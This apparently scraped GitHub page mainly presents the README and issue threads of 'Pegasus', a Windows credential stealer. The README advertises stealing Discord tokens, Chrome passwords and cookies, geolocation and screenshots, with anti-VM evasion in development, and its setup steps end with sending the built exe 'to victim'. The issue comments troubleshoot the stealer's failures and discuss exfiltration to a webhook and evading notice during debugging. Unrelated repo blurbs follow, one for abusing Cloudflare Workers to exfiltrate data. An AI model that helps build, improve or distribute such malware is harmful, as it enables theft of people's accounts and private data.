Pull sensitive data from users on windows including discord tokens and chrome data.

Overview

For a 🍪

Pegasus

Pull sensitive data from users on windows including discord tokens and chrome data.


Features

  • 🟩 Discord tokens
  • 🟩 Geolocation data
  • 🟩 Chrome passwords & cookies
  • 🟩 Screenshot
  • ⬛️ MacOS support
  • 🟩 Injections
  • ⬛️ Obfuscation
  • 🟨 Anti VM / Virus Scan / Debug
🟩 = Done/Working | 🟨 = In development | ⬛️ = Todo

Prerequisites


Setup

  1. Open your cli of choice
  2. Clone the repository with git clone https://github.com/addi00000/pegasus.git
  3. Enter the dirctory with cd pegasus
  4. Install dependencies with pip install -r requirements.txt
  5. Run the builder with python builder.py
  6. Follow instructions in builder and your exe will be in the same directory
  7. Send exe to victim ;)


Errors?

Comments
  • Lots of errors

    Lots of errors

    First Error: Traceback (most recent call last): File "", line 535, in File "", line 69, in pegasus File "", line 41, in main File "", line 127, in init File "", line 243, in grabTokens KeyError: 'premium_type'

    Second Error: Traceback (most recent call last): File "", line 537, in File "", line 437, in cleanup FileNotFoundError: [WinError 2] The system cannot find the file specified: 'google-passwords.txt'

    Third Error: NameError: name 'exit' is not defined

    bug 
    opened by Smug246 6
  • nothing gets sent to my webhook

    nothing gets sent to my webhook

    not sure if i did everything correctly but a video below is the steps i did, nothing gets sent to the webhook for some reason https://cdn.discordapp.com/attachments/985665401528680451/985668315299053679/unknown_2022.06.12-18.07.mp4

    opened by tanukieggs 1
  • update pegasus.py

    update pegasus.py

    made use of utilities api (less obvious than ipinfo if debugged somehow), in a try:except: so that ipinfo is used in case utilities fails cleaned imports

    opened by mte0 1
  • Code Overhaul

    Code Overhaul

    I overhauled the code for both pegasus.py and builder.py. I don't know if the changes can work, because I'm not using Windows, but you can clone my fork and test it out.

    If there are any errors, please comment on this PR so I can fix it.

    I swapped some try/except blocks with contextlib.suppress context managers, but the most of parameters in those replacements are Exception, you might wanna change this to make it more specific

    enhancement 
    opened by Kiwifuit 1
  • A nicer and less lines (FILE UPLOAD BROKEN ATM)

    A nicer and less lines (FILE UPLOAD BROKEN ATM)

    This makes the code easier to navigate, The embed less cumbersome and also includes more info (Credit to Rdimo Hazard Grabber V.2) . Removed/Merged functions so its cleaner to use.

    opened by LocalSmail 0
Abusing Cloudflare Workers to establish persistence and exfiltrate sensitive data at the edge.

Abusing Cloudflare Workers This repository contains companion code for the blog post MITM at the Edge: Abusing Cloudflare Workers. malicious-worker/ c

Christophe Tafani-Dereeper 10 Sep 16, 2022
This is an unofficial front end for Hacker News, reminiscent of the Windows XP era Outlook email client on a Windows XP default desktop

Hacker XP Hacker News styled as the Windows XP Outlook email client. Try out Hacker XP here! Description This is an unofficial front end for Hacker Ne

null 19 Jul 12, 2022
Keep your sensitive information out of chat logs, emails, and more with heavily encrypted secrets.

Free encrypted secret sharing for everyone! This application is to be used to share encrypted secrets cross organizations, or as private persons. Hemm

Hemmelig 246 Dec 31, 2022
A webpack plugin to enforce case-sensitive paths when resolving module

@umijs/case-sensitive-paths-webpack-plugin A webpack plugin to enforce case-sensitive paths when resolving module, similar to the well-known case-sens

UmiJS 13 Jul 25, 2022
This project is a Web application based on an external API. The API provides data about music (including artists, albums, etc) that users can access on-demand. This project was built with ES6, HTML and CSS and it is a SPA.

Capstone M2: Music App This project is a Web application based on the music API Napster built with ES6, HTML and CSS and it is a SPA. This API provide

Karla Delgado 12 Aug 29, 2022
🎯 Wallet Lite is a Quick and Simple way to use your Tokens of Lunes Blockchain in a light Chrome extension

Lunes Wallet Lite Offered by: Lunes Installing Web store: Lunes Lite will be available on Chrome Web Store Build: Requisites NodeJS (16 or higher) Git

Lunes Platform 10 Oct 25, 2022
Awesome Books is a basic website that allows users to add/remove books from a list (including the title and author). It has threee different sections: 1. books list, 2. add new book, 3. contact.

awesomeBooks-modules Awesome Books is a basic website that allows users to add/remove books from a list (including the title and author). It has three

Juan Diaz 6 Aug 26, 2022
Loops through a list of Discord tokens in a file to check if they are valid/invalid

Discord Token Checker Loops through a list of Discord tokens in a file to check if they are valid/invalid. Click here to report bugs. Usage Download Z

null 319 Dec 31, 2022
Discord Like Tokens for Authentication for Everyone. Uses HMAC with SHA-256

DC Tokens About DCTokens are the discord like tokens that can be used for authentiction in your website, api, or anything you want (you can even trick

Arnav Kumar 3 Oct 31, 2022
GitHub Action that posts the report in a comment on a GitHub Pull Request from coverage data generated by nyc (istanbul)

GitHub Action: Report NYC coverage GitHub Action that posts the report in a comment on a GitHub Pull Request from coverage data generated by nyc (ista

Sid 16 Nov 23, 2022
A REST API which provides you the information of any discord account including their Spotify & VS-Code activity!

Friday A REST API which provides you the information of any discord account including their Spotify & VS-Code activity! This is an open sourced reposi

Ayan 5 Jan 4, 2023
A health-focused app for users to be able to track workouts and nutritional data with a social media component to inspire friendly competition among the users.

A health-focused app for users to be able to track workouts and nutritional data with a social media component to inspire friendly competition among the users.

Jon Jackson 3 Aug 26, 2022
Minty is an example of how to mint non-fungible tokens (NFTs) while storing the associated data on IPFS

Minty is an example of how to mint non-fungible tokens (NFTs) while storing the associated data on IPFS. You can also use Minty to pin your data on an IPFS pinning service such as nft.storage and Pinata.

One & Zeros 10 Nov 12, 2022
Query for CSS brower support data, combined from caniuse and MDN, including version support started and global support percentages.

css-browser-support Query for CSS browser support data, combined from caniuse and MDN, including version support started and global support percentage

Stephanie Eckles 65 Nov 2, 2022
Persistent key/value data storage for your Browser and/or PWA, promisified, including file support and service worker support, all with IndexedDB. Perfectly suitable for your next (PWA) app.

BrowstorJS ?? ?? ?? Persistent key/value data storage for your Browser and/or PWA, promisified, including file support and service worker support, all

Nullix 8 Aug 5, 2022
Journeys is a django based community-focused website that allows users to bookmark URLs (through chrome extension) and share their journeys through timelines.

Journeys is a django based community-focused website that allows users to bookmark URLs (through chrome extension) and share their journeys through timelines. A timeline is a collection of links that share a common topic or a journey of building and learning something new. Users can create timelines, share them publicly, and explore resources.

Students' Web Committee 14 Jun 13, 2022
Example CRUD API for API Fest'22. See Pull Requests for chapter 2 and 3

Example CRUD API for API Fest'22. See Pull Requests for chapter 2 and 3

Postman Student Program 6 Mar 2, 2022